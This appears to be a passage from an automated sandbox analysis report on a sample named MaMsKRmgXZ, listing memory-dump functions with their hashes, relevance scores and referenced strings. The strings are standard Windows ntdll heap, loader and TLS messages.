Opcode ID: ddcce05191e3d835882812bf7190b12c93aa918ab4d4553a99cb4184be1b56a2
Instruction ID: 40ea3684f5f48d5d3ec68f150b273dc60201ff21f28190e870d759c347a3a420
Opcode Fuzzy Hash: ddcce05191e3d835882812bf7190b12c93aa918ab4d4553a99cb4184be1b56a2
Instruction Fuzzy Hash: 28F1F676E006129FDF08CF68C99067DBFF6EF88280B56416DE4A6EB384D674E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 341D7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

Invalid heap signature for heap at %p, xrefs: 3423ADBE
HEAP: , xrefs: 3423ADB2
HEAP[%wZ]: , xrefs: 3423ADA5
, passed to %s, xrefs: 3423ADCF
RtlFreeHeap, xrefs: 3423ADCE

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 3036a5d93eacae4301bda9b711b05dbe72028e6223438287c5d991401ac26d21
Instruction ID: 361c851354218121a450354ab41632acd55e073ade5ec22aa1c0abdc241e01ff
Opcode Fuzzy Hash: 3036a5d93eacae4301bda9b711b05dbe72028e6223438287c5d991401ac26d21
Instruction Fuzzy Hash: 67014CF7016D84DFF7099368D489F53BBA4DB43770F1540EFE046A7A928B95A840D950

Uniqueness

Uniqueness Score: -1.00%

Function 341E0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E05D6

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 341E0586
kLsE, xrefs: 341E05FE

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 779909ca2301983b195842d7f1bfc065345c1522646a1c907f53e5ba5bae1eb1
Instruction ID: bbc0a41444dbd67a834f426cff3056bf8ac498ad1e4e9f197a8f78f43852e485
Opcode Fuzzy Hash: 779909ca2301983b195842d7f1bfc065345c1522646a1c907f53e5ba5bae1eb1
Instruction Fuzzy Hash: ED51AEB9A00F16DFEB14DFA4C4C06BABBF8AF46304F00847ED595A7240EB349585CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 3421265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 342127F8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34251FE3, 342520BB
SXS: %s() passed the empty activation context, xrefs: 34251FE8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 342520C0

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 094ff78a1c22dd4ca84b3bed43ea19c1abdec80ec199d84821fb76c4614ede7b
Instruction ID: e0d7777a1d3116575449a02903848103fd561fbaa2a77073a05ecaebb77a61ac
Opcode Fuzzy Hash: 094ff78a1c22dd4ca84b3bed43ea19c1abdec80ec199d84821fb76c4614ede7b
Instruction Fuzzy Hash: D7A18E75A0132A9FEB24CF64DC84B99B3B5BF58354F2101E9E808B7291D7719E81CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 341DF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3423E2F2
HEAP: , xrefs: 3423E2DD
HEAP[%wZ]: , xrefs: 3423E18D
`, xrefs: 3423E1B7

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: c627652ebacdd4cd38b957b0098d6e842833499da02a2b00c4d603b5527c5325
Instruction ID: b2d5fb92f4377a3bf5b7a6e85f5e3b80e343f2b0d4419bd5bc1de5a108759fee
Opcode Fuzzy Hash: c627652ebacdd4cd38b957b0098d6e842833499da02a2b00c4d603b5527c5325
Instruction Fuzzy Hash: CB6141B1205B81DFE311CB24CC94F67B7E9EF85B90F050459F994AB291DB34E904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 341D90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3423B83C, 3423B879
HEAP[%wZ]: , xrefs: 3423B82F, 3423B86C
VirtualProtect Failed 0x%p %x, xrefs: 3423B849
VirtualQuery Failed 0x%p %x, xrefs: 3423B886

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 0bf02f0f5a4bd1ceb7b183e90ac0154f23cf420fbf659a85d2fbfa8d628f5397
Instruction ID: 829e2eed3811b10b79524da48ecef812858e384ada8a7343f8ca4f364fda933c
Opcode Fuzzy Hash: 0bf02f0f5a4bd1ceb7b183e90ac0154f23cf420fbf659a85d2fbfa8d628f5397
Instruction Fuzzy Hash: 3931D4B6A11644EFDB01CF54CCC4FAABBB9EB467B0F104199F815AB292D730E940CE60

Uniqueness

Uniqueness Score: -1.00%

Function 34221190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3422119B
@, xrefs: 342211C5
BuildLabEx, xrefs: 3422122F
e!4, xrefs: 34221230, 34221240, 34221233, 34221245

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e!4
API String ID: 0-1339849214
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: 7c0d2daeedf589b9ebbd4c20a103d3c63ab2258e336fd4dbc30e8e4ba263803e
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: BE315E72900619FFEB51CB95CC44EAEBBBDEB84760F404125F514B7260EB31DA05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 3426166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

.txt2, xrefs: 342616FD
.txt, xrefs: 342616E4
stxt371, xrefs: 342616CC
BoG_ *90.0&!! Yy>, xrefs: 34261693

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
API String ID: 0-1880532218
Opcode ID: 26c88bb516d20db0d3c198a31e477b0a32b169721ff8528a56ade8777d1a43ae
Instruction ID: 8842392d82559b9d49d96c9344bed09adc13def6887358ff76051f9b29929f19
Opcode Fuzzy Hash: 26c88bb516d20db0d3c198a31e477b0a32b169721ff8528a56ade8777d1a43ae
Instruction Fuzzy Hash: 79212979A41601AFD7468B54DD91AAA73F5AF44748F0440AAE886B7341EB78ED41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 341E7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 342415E0
RtlDebugPrintTimes.NTDLL ref: 342415F5

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0c589cbbf7602398fccacd10ec37abd9f738d4097616af485c07dfa51b7cea80
Instruction ID: 25ab31e28cf7afdc08d6b03b3a717d8a033a54a0261e4154af06789c14ed6224
Opcode Fuzzy Hash: 0c589cbbf7602398fccacd10ec37abd9f738d4097616af485c07dfa51b7cea80
Instruction Fuzzy Hash: B9510139A00B06EFFB09DB65C8887BDB7B5FF44391F10416AE422A3290DB709951CB80

Uniqueness

Uniqueness Score: -1.00%

Function 34273608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

PE, xrefs: 342737D2
LdrpResSearchResourceHandle Exit, xrefs: 34273681
LdrpResSearchResourceHandle Enter, xrefs: 34273666

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 9bece7259ab03327fa8eebc6daf789b4389f2ce090ef90a06dcd78a254552d84
Instruction ID: 5ce1b7f75ff87b7b7e9f187c6b60117ac7ce0c5add66b6159f54765f5b307c79
Opcode Fuzzy Hash: 9bece7259ab03327fa8eebc6daf789b4389f2ce090ef90a06dcd78a254552d84
Instruction Fuzzy Hash: 25F16DB5A00229CBDB20CF14CC90BD9BBB5EF44754F4481E9E609B7242EB359E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 3420F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 34250128
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 342500C7
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 342500F1

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 8bbfd93967b79b8e3611073148378e4acbfab09a7876a97aef6036e13b90e632
Instruction ID: 0c18cd6cf9afb804b6139332c4c83ba950c5b07fc688af8fce1440289f932bb6
Opcode Fuzzy Hash: 8bbfd93967b79b8e3611073148378e4acbfab09a7876a97aef6036e13b90e632
Instruction Fuzzy Hash: 45E1C174608742DFE311CF28C880B1AB7E5BF84354F118A5DF565AB2E1DBB4E944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 341EB5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 341EB634
MUI, xrefs: 341EB5F8, 341EB707
LdrResGetRCConfig Enter, xrefs: 341EB622

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 933dae2bf1227b1bf087441c4baa3790fc9235fe606611063b6a62406eb385bf
Instruction ID: 5218056fb79e5b2aea77b5720509a39a07be81d82e54544d563cc274d8588ee1
Opcode Fuzzy Hash: 933dae2bf1227b1bf087441c4baa3790fc9235fe606611063b6a62406eb385bf
Instruction Fuzzy Hash: 29B17779A11B068FEB18CF65C890BAEB7B6EF44794F508429E851EB790D770E880CB04

Uniqueness

Uniqueness Score: -1.00%

Function 341DA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 3423C075
UseFilter, xrefs: 341DA171
\??\, xrefs: 3423BF73

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 139cb9efb787d12781c125bec447edb5eba035cffc92a1b10eb0536e80c5aa97
Instruction ID: 59c308203e746248cc080755b1a5d824b2135d4f1bf6914a4ecc6103ea23e2d9
Opcode Fuzzy Hash: 139cb9efb787d12781c125bec447edb5eba035cffc92a1b10eb0536e80c5aa97
Instruction Fuzzy Hash: B4A162B69116299FDB21DF28CC88B99B7B8EF08750F1041E9E909B7250D7359EC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 34267090 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

Objects=%4u, xrefs: 3426726A
Objects>%4u, xrefs: 34267255
VirtualAlloc, xrefs: 3426727C

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: 8e6ba49458d7632ec835e7b0950106c68f6ca97a2e3345058d11b2bd9e86e23e
Instruction ID: f79c1453a6883cfc342979a3f5bfc6650739c485570899a3c7e8c2edc249fbfa
Opcode Fuzzy Hash: 8e6ba49458d7632ec835e7b0950106c68f6ca97a2e3345058d11b2bd9e86e23e
Instruction Fuzzy Hash: B1911DB4E00605DFEB14CF59D880B9DB7B1BF88318F14816AE905BB355EB799881CF54

Uniqueness

Uniqueness Score: -1.00%

Function 341DF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3423E442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3423E455
HEAP[%wZ]: , xrefs: 3423E435

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 7ae1b1fa05053bd54f41ddf051792f66623e743c2342a579bdac309311dbd019
Instruction ID: 78e6009329fde0220f797fc53bab68179cd1a15dee7263b0b722d8354658e9f2
Opcode Fuzzy Hash: 7ae1b1fa05053bd54f41ddf051792f66623e743c2342a579bdac309311dbd019
Instruction Fuzzy Hash: F95112B5701B84EFE701CBA8C8D4BAABBF8EF05344F0441A9E5459B692D734EA05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 34201514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 3424A3A7
Could not validate the crypto signature for DLL %wZ, xrefs: 3424A396
LdrpCompleteMapModule, xrefs: 3424A39D

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: a452c250b9ba814690aacff30e19e25f346dbea1c089e3e8b9a43c65dbb18361
Instruction ID: 5cfb6f48c3f9b71cb0957343e005a3f7a8e408de420081a42e6a581c061aad7b
Opcode Fuzzy Hash: a452c250b9ba814690aacff30e19e25f346dbea1c089e3e8b9a43c65dbb18361
Instruction Fuzzy Hash: 3B51E178A00B46DFF725CA58C985B29BBE5EF00794F114298E952BF6D1EB75E900CF40

Uniqueness

Uniqueness Score: -1.00%

Function 3428D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3428D79F
HEAP[%wZ]: , xrefs: 3428D792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 3428D7B2

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 489a4ebb9b3e448ed52e1aa5c4306434f5caff2318536f193b8038ee2c5f4f72
Instruction ID: a528d65bd6f018ac631213d88e48caeada553d1d2bfb8f852c107e2206572d6d
Opcode Fuzzy Hash: 489a4ebb9b3e448ed52e1aa5c4306434f5caff2318536f193b8038ee2c5f4f72
Instruction Fuzzy Hash: 2151377A2307A5CFF350CA29C84477A73E6DF45284F9048CDE4D6AB2C5D626D84BDB20

Uniqueness

Uniqueness Score: -1.00%

Function 341D753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3423AD47
Invalid address specified to %s( %p, %p ), xrefs: 3423AD5A
HEAP[%wZ]: , xrefs: 3423AD3A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 4575353f65b6c5c1dbc60b3b67cf947a73d840378577b00f04c06ea28e48f00f
Instruction ID: bb206de18140715b759512e29e54d0321a4da15e0c9319bca409873046d3c95f
Opcode Fuzzy Hash: 4575353f65b6c5c1dbc60b3b67cf947a73d840378577b00f04c06ea28e48f00f
Instruction Fuzzy Hash: AC4152FA201B858FFB14CE18C8C0BB677A4DF06344F6544BDD4969B656DBA0E846CB21

Uniqueness

Uniqueness Score: -1.00%

Function 342115EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34251943
minkernel\ntdll\ldrtls.c, xrefs: 34251954
LdrpAllocateTls, xrefs: 3425194A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: c122fe2c5dcf538bb55cffbf407c70b162732bc2cc0c4dc4b9354a736c76a250
Instruction ID: 669b48d4f2e45afe8a55de932b868e4e39b00a01450f6ec863e96430490c6885
Opcode Fuzzy Hash: c122fe2c5dcf538bb55cffbf407c70b162732bc2cc0c4dc4b9354a736c76a250
Instruction Fuzzy Hash: 0F4159B9E00A09EFEB14CFA9C885AADBBF6FF48340F048159E405B7251DB35A841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 34211527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

LdrpInitializeTls, xrefs: 34251851
DLL "%wZ" has TLS information at %p, xrefs: 3425184A
minkernel\ntdll\ldrtls.c, xrefs: 3425185B

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 55f70b8164f448dd0fd70080c5cb5893d6f7274721f4498c10067a5d27a1c82a
Instruction ID: 735c965188980f4bb4c0234aa21d6dae2c3f70e7a177f3e70db5ea4bfce9673a
Opcode Fuzzy Hash: 55f70b8164f448dd0fd70080c5cb5893d6f7274721f4498c10067a5d27a1c82a
Instruction Fuzzy Hash: 9831CF71E10605BFF7208B59CC89B6A7AE9EF49795F010169E403B7190EBB0AD85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 342685AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 342685DE

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 15a372a79608ccf6ebb1e1bf3e56590a967410474e14875202ca7144e10cb013
Instruction ID: 4bb68b8c6455a25cb1f89ccd328e052bebdeeec2925351549a8ef6f4f2b467ff
Opcode Fuzzy Hash: 15a372a79608ccf6ebb1e1bf3e56590a967410474e14875202ca7144e10cb013
Instruction Fuzzy Hash: CB012B75A01701DFE7204E15D8CCB667B66EF46298F40085CED4337452CFE4A8C5CE95

Uniqueness

Uniqueness Score: -1.00%

Function 341F51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 341F5365
@, xrefs: 341F54C3

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: b86202902b68377f4360f441e6e6d1caa3eb24d3e5ca4a85492b3941a5a895ce
Instruction ID: d1638510e6589f833ac736b149e0f2c84f28c03df3761fe169368a2181160049
Opcode Fuzzy Hash: b86202902b68377f4360f441e6e6d1caa3eb24d3e5ca4a85492b3941a5a895ce
Instruction Fuzzy Hash: 6932D0B4608B128FD754CF14C8C0B2EB7E5EF88744F414A5EF8859B2A5E736D846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 341E5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E5698
RtlDebugPrintTimes.NTDLL ref: 3424061D

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 86f2c8b4c45ee47cda23bb0f48dce994ce3cf82625c03ca6216eff853c70cfd5
Instruction ID: 07cdf774333c58927e4d043cbf945efbe430b531ad5649539c1b02aa4daee0bb
